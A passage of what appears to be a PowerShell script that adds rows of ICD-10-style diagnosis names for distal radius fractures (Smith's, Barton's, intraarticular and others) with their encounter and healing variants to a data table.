$DiagnosisList.Rows.Add("Smith's fracture of left radius","Smith's fracture of left radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Smith's fracture of left radius","Smith's fracture of left radius, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Smith's fracture of left radius","Smith's fracture of left radius, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Smith's fracture of left radius","Smith's fracture of left radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Smith's fracture of left radius","Smith's fracture of left radius, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Smith's fracture of left radius","Smith's fracture of left radius, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Smith's fracture of left radius","Smith's fracture of left radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Smith's fracture of left radius","Smith's fracture of left radius, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Smith's fracture of left radius","Smith's fracture of left radius, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Smith's fracture of left radius","Smith's fracture of left radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Smith's fracture of left radius","Smith's fracture of left radius, sequela") + $null = $DiagnosisList.Rows.Add("Smith's fracture of unspecified radius","Smith's fracture of unspecified radius, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Smith's fracture of unspecified radius","Smith's fracture of unspecified radius, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Smith's fracture of unspecified radius","Smith's fracture of unspecified radius, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Smith's fracture of unspecified radius","Smith's fracture of unspecified radius, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Smith's fracture of unspecified radius","Smith's fracture of unspecified radius, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Smith's fracture of unspecified radius","Smith's fracture of unspecified radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Smith's fracture of unspecified radius","Smith's fracture of unspecified radius, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Smith's fracture of unspecified radius","Smith's fracture of unspecified radius, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Smith's fracture of unspecified radius","Smith's fracture of unspecified radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Smith's fracture of unspecified radius","Smith's fracture of unspecified radius, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Smith's fracture of unspecified radius","Smith's fracture of unspecified radius, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Smith's fracture of unspecified radius","Smith's fracture of unspecified radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Smith's fracture of unspecified radius","Smith's fracture of unspecified radius, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Smith's fracture of unspecified radius","Smith's fracture of unspecified radius, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Smith's fracture of unspecified radius","Smith's fracture of unspecified radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Smith's fracture of unspecified radius","Smith's fracture of unspecified radius, sequela") + $null = $DiagnosisList.Rows.Add("Other extraarticular fracture of lower end of right radius","Other extraarticular fracture of lower end of right radius, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other extraarticular fracture of lower end of right radius","Other extraarticular fracture of lower end of right radius, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Other extraarticular fracture of lower end of right radius","Other extraarticular fracture of lower end of right radius, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Other extraarticular fracture of lower end of right radius","Other extraarticular fracture of lower end of right radius, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other extraarticular fracture of lower end of right radius","Other extraarticular fracture of lower end of right radius, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Other extraarticular fracture of lower end of right radius","Other extraarticular fracture of lower end of right radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Other extraarticular fracture of lower end of right radius","Other extraarticular fracture of lower end of right radius, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other extraarticular fracture of lower end of right radius","Other extraarticular fracture of lower end of right radius, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Other extraarticular fracture of lower end of right radius","Other extraarticular fracture of lower end of right radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Other extraarticular fracture of lower end of right radius","Other extraarticular fracture of lower end of right radius, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other extraarticular fracture of lower end of right radius","Other extraarticular fracture of lower end of right radius, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Other extraarticular fracture of lower end of right radius","Other extraarticular fracture of lower end of right radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Other extraarticular fracture of lower end of right radius","Other extraarticular fracture of lower end of right radius, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other extraarticular fracture of lower end of right radius","Other extraarticular fracture of lower end of right radius, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Other extraarticular fracture of lower end of right radius","Other extraarticular fracture of lower end of right radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Other extraarticular fracture of lower end of right radius","Other extraarticular fracture of lower end of right radius, sequela") + $null = $DiagnosisList.Rows.Add("Other extraarticular fracture of lower end of left radius","Other extraarticular fracture of lower end of left radius, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other extraarticular fracture of lower end of left radius","Other extraarticular fracture of lower end of left radius, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Other extraarticular fracture of lower end of left radius","Other extraarticular fracture of lower end of left radius, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Other extraarticular fracture of lower end of left radius","Other extraarticular fracture of lower end of left radius, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other extraarticular fracture of lower end of left radius","Other extraarticular fracture of lower end of left radius, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Other extraarticular fracture of lower end of left radius","Other extraarticular fracture of lower end of left radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Other extraarticular fracture of lower end of left radius","Other extraarticular fracture of lower end of left radius, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other extraarticular fracture of lower end of left radius","Other extraarticular fracture of lower end of left radius, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Other extraarticular fracture of lower end of left radius","Other extraarticular fracture of lower end of left radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Other extraarticular fracture of lower end of left radius","Other extraarticular fracture of lower end of left radius, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other extraarticular fracture of lower end of left radius","Other extraarticular fracture of lower end of left radius, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Other extraarticular fracture of lower end of left radius","Other extraarticular fracture of lower end of left radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Other extraarticular fracture of lower end of left radius","Other extraarticular fracture of lower end of left radius, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other extraarticular fracture of lower end of left radius","Other extraarticular fracture of lower end of left radius, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Other extraarticular fracture of lower end of left radius","Other extraarticular fracture of lower end of left radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Other extraarticular fracture of lower end of left radius","Other extraarticular fracture of lower end of left radius, sequela") + $null = $DiagnosisList.Rows.Add("Other extraarticular fracture of lower end of unspecified radius","Other extraarticular fracture of lower end of unspecified radius, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other extraarticular fracture of lower end of unspecified radius","Other extraarticular fracture of lower end of unspecified radius, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Other extraarticular fracture of lower end of unspecified radius","Other extraarticular fracture of lower end of unspecified radius, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Other extraarticular fracture of lower end of unspecified radius","Other extraarticular fracture of lower end of unspecified radius, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other extraarticular fracture of lower end of unspecified radius","Other extraarticular fracture of lower end of unspecified radius, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Other extraarticular fracture of lower end of unspecified radius","Other extraarticular fracture of lower end of unspecified radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Other extraarticular fracture of lower end of unspecified radius","Other extraarticular fracture of lower end of unspecified radius, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other extraarticular fracture of lower end of unspecified radius","Other extraarticular fracture of lower end of unspecified radius, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Other extraarticular fracture of lower end of unspecified radius","Other extraarticular fracture of lower end of unspecified radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Other extraarticular fracture of lower end of unspecified radius","Other extraarticular fracture of lower end of unspecified radius, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other extraarticular fracture of lower end of unspecified radius","Other extraarticular fracture of lower end of unspecified radius, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Other extraarticular fracture of lower end of unspecified radius","Other extraarticular fracture of lower end of unspecified radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Other extraarticular fracture of lower end of unspecified radius","Other extraarticular fracture of lower end of unspecified radius, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other extraarticular fracture of lower end of unspecified radius","Other extraarticular fracture of lower end of unspecified radius, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Other extraarticular fracture of lower end of unspecified radius","Other extraarticular fracture of lower end of unspecified radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Other extraarticular fracture of lower end of unspecified radius","Other extraarticular fracture of lower end of unspecified radius, sequela") + $null = $DiagnosisList.Rows.Add("Barton's fracture of right radius","Barton's fracture of right radius, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Barton's fracture of right radius","Barton's fracture of right radius, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Barton's fracture of right radius","Barton's fracture of right radius, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Barton's fracture of right radius","Barton's fracture of right radius, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Barton's fracture of right radius","Barton's fracture of right radius, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Barton's fracture of right radius","Barton's fracture of right radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Barton's fracture of right radius","Barton's fracture of right radius, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Barton's fracture of right radius","Barton's fracture of right radius, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Barton's fracture of right radius","Barton's fracture of right radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Barton's fracture of right radius","Barton's fracture of right radius, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Barton's fracture of right radius","Barton's fracture of right radius, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Barton's fracture of right radius","Barton's fracture of right radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Barton's fracture of right radius","Barton's fracture of right radius, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Barton's fracture of right radius","Barton's fracture of right radius, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Barton's fracture of right radius","Barton's fracture of right radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Barton's fracture of right radius","Barton's fracture of right radius, sequela") + $null = $DiagnosisList.Rows.Add("Barton's fracture of left radius","Barton's fracture of left radius, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Barton's fracture of left radius","Barton's fracture of left radius, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Barton's fracture of left radius","Barton's fracture of left radius, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Barton's fracture of left radius","Barton's fracture of left radius, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Barton's fracture of left radius","Barton's fracture of left radius, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Barton's fracture of left radius","Barton's fracture of left radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Barton's fracture of left radius","Barton's fracture of left radius, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Barton's fracture of left radius","Barton's fracture of left radius, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Barton's fracture of left radius","Barton's fracture of left radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Barton's fracture of left radius","Barton's fracture of left radius, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Barton's fracture of left radius","Barton's fracture of left radius, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Barton's fracture of left radius","Barton's fracture of left radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Barton's fracture of left radius","Barton's fracture of left radius, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Barton's fracture of left radius","Barton's fracture of left radius, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Barton's fracture of left radius","Barton's fracture of left radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Barton's fracture of left radius","Barton's fracture of left radius, sequela") + $null = $DiagnosisList.Rows.Add("Barton's fracture of unspecified radius","Barton's fracture of unspecified radius, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Barton's fracture of unspecified radius","Barton's fracture of unspecified radius, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Barton's fracture of unspecified radius","Barton's fracture of unspecified radius, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Barton's fracture of unspecified radius","Barton's fracture of unspecified radius, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Barton's fracture of unspecified radius","Barton's fracture of unspecified radius, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Barton's fracture of unspecified radius","Barton's fracture of unspecified radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Barton's fracture of unspecified radius","Barton's fracture of unspecified radius, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Barton's fracture of unspecified radius","Barton's fracture of unspecified radius, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Barton's fracture of unspecified radius","Barton's fracture of unspecified radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Barton's fracture of unspecified radius","Barton's fracture of unspecified radius, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Barton's fracture of unspecified radius","Barton's fracture of unspecified radius, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Barton's fracture of unspecified radius","Barton's fracture of unspecified radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Barton's fracture of unspecified radius","Barton's fracture of unspecified radius, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Barton's fracture of unspecified radius","Barton's fracture of unspecified radius, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Barton's fracture of unspecified radius","Barton's fracture of unspecified radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Barton's fracture of unspecified radius","Barton's fracture of unspecified radius, sequela") + $null = $DiagnosisList.Rows.Add("Other intraarticular fracture of lower end of right radius","Other intraarticular fracture of lower end of right radius, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other intraarticular fracture of lower end of right radius","Other intraarticular fracture of lower end of right radius, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Other intraarticular fracture of lower end of right radius","Other intraarticular fracture of lower end of right radius, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Other intraarticular fracture of lower end of right radius","Other intraarticular fracture of lower end of right radius, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other intraarticular fracture of lower end of right radius","Other intraarticular fracture of lower end of right radius, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Other intraarticular fracture of lower end of right radius","Other intraarticular fracture of lower end of right radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Other intraarticular fracture of lower end of right radius","Other intraarticular fracture of lower end of right radius, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other intraarticular fracture of lower end of right radius","Other intraarticular fracture of lower end of right radius, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Other intraarticular fracture of lower end of right radius","Other intraarticular fracture of lower end of right radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Other intraarticular fracture of lower end of right radius","Other intraarticular fracture of lower end of right radius, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other intraarticular fracture of lower end of right radius","Other intraarticular fracture of lower end of right radius, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Other intraarticular fracture of lower end of right radius","Other intraarticular fracture of lower end of right radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Other intraarticular fracture of lower end of right radius","Other intraarticular fracture of lower end of right radius, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other intraarticular fracture of lower end of right radius","Other intraarticular fracture of lower end of right radius, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Other intraarticular fracture of lower end of right radius","Other intraarticular fracture of lower end of right radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Other intraarticular fracture of lower end of right radius","Other intraarticular fracture of lower end of right radius, sequela") + $null = $DiagnosisList.Rows.Add("Other intraarticular fracture of lower end of left radius","Other intraarticular fracture of lower end of left radius, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other intraarticular fracture of lower end of left radius","Other intraarticular fracture of lower end of left radius, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Other intraarticular fracture of lower end of left radius","Other intraarticular fracture of lower end of left radius, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Other intraarticular fracture of lower end of left radius","Other intraarticular fracture of lower end of left radius, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other intraarticular fracture of lower end of left radius","Other intraarticular fracture of lower end of left radius, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Other intraarticular fracture of lower end of left radius","Other intraarticular fracture of lower end of left radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Other intraarticular fracture of lower end of left radius","Other intraarticular fracture of lower end of left radius, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other intraarticular fracture of lower end of left radius","Other intraarticular fracture of lower end of left radius, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Other intraarticular fracture of lower end of left radius","Other intraarticular fracture of lower end of left radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Other intraarticular fracture of lower end of left radius","Other intraarticular fracture of lower end of left radius, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other intraarticular fracture of lower end of left radius","Other intraarticular fracture of lower end of left radius, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Other intraarticular fracture of lower end of left radius","Other intraarticular fracture of lower end of left radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Other intraarticular fracture of lower end of left radius","Other intraarticular fracture of lower end of left radius, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other intraarticular fracture of lower end of left radius","Other intraarticular fracture of lower end of left radius, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Other intraarticular fracture of lower end of left radius","Other intraarticular fracture of lower end of left radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Other intraarticular fracture of lower end of left radius","Other intraarticular fracture of lower end of left radius, sequela") + $null = $DiagnosisList.Rows.Add("Other intraarticular fracture of lower end of unspecified radius","Other intraarticular fracture of lower end of unspecified radius, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other intraarticular fracture of lower end of unspecified radius","Other intraarticular fracture of lower end of unspecified radius, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Other intraarticular fracture of lower end of unspecified radius","Other intraarticular fracture of lower end of unspecified radius, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Other intraarticular fracture of lower end of unspecified radius","Other intraarticular fracture of lower end of unspecified radius, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other intraarticular fracture of lower end of unspecified radius","Other intraarticular fracture of lower end of unspecified radius, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Other intraarticular fracture of lower end of unspecified radius","Other intraarticular fracture of lower end of unspecified radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Other intraarticular fracture of lower end of unspecified radius","Other intraarticular fracture of lower end of unspecified radius, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other intraarticular fracture of lower end of unspecified radius","Other intraarticular fracture of lower end of unspecified radius, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Other intraarticular fracture of lower end of unspecified radius","Other intraarticular fracture of lower end of unspecified radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Other intraarticular fracture of lower end of unspecified radius","Other intraarticular fracture of lower end of unspecified radius, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other intraarticular fracture of lower end of unspecified radius","Other intraarticular fracture of lower end of unspecified radius, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Other intraarticular fracture of lower end of unspecified radius","Other intraarticular fracture of lower end of unspecified radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Other intraarticular fracture of lower end of unspecified radius","Other intraarticular fracture of lower end of unspecified radius, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other intraarticular fracture of lower end of unspecified radius","Other intraarticular fracture of lower end of unspecified radius, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Other intraarticular fracture of lower end of unspecified radius","Other intraarticular fracture of lower end of unspecified radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Other intraarticular fracture of lower end of unspecified radius","Other intraarticular fracture of lower end of unspecified radius, sequela") + $null = $DiagnosisList.Rows.Add("Other fractures of lower end of right radius","Other fractures of lower end of right radius, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other fractures of lower end of right radius","Other fractures of lower end of right radius, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Other fractures of lower end of right radius","Other fractures of lower end of right radius, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Other fractures of lower end of right radius","Other fractures of lower end of right radius, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other fractures of lower end of right radius","Other fractures of lower end of right radius, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Other fractures of lower end of right radius","Other fractures of lower end of right radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Other fractures of lower end of right radius","Other fractures of lower end of right radius, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fractures of lower end of right radius","Other fractures of lower end of right radius, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fractures of lower end of right radius","Other fractures of lower end of right radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fractures of lower end of right radius","Other fractures of lower end of right radius, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other fractures of lower end of right radius","Other fractures of lower end of right radius, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Other fractures of lower end of right radius","Other fractures of lower end of right radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Other fractures of lower end of right radius","Other fractures of lower end of right radius, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other fractures of lower end of right radius","Other fractures of lower end of right radius, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Other fractures of lower end of right radius","Other fractures of lower end of right radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Other fractures of lower end of right radius","Other fractures of lower end of right radius, sequela") + $null = $DiagnosisList.Rows.Add("Other fractures of lower end of left radius","Other fractures of lower end of left radius, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other fractures of lower end of left radius","Other fractures of lower end of left radius, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Other fractures of lower end of left radius","Other fractures of lower end of left radius, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Other fractures of lower end of left radius","Other fractures of lower end of left radius, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other fractures of lower end of left radius","Other fractures of lower end of left radius, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Other fractures of lower end of left radius","Other fractures of lower end of left radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Other fractures of lower end of left radius","Other fractures of lower end of left radius, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fractures of lower end of left radius","Other fractures of lower end of left radius, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fractures of lower end of left radius","Other fractures of lower end of left radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fractures of lower end of left radius","Other fractures of lower end of left radius, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other fractures of lower end of left radius","Other fractures of lower end of left radius, subsequent encounter for open fracture type I or II with nonunion") + $null = 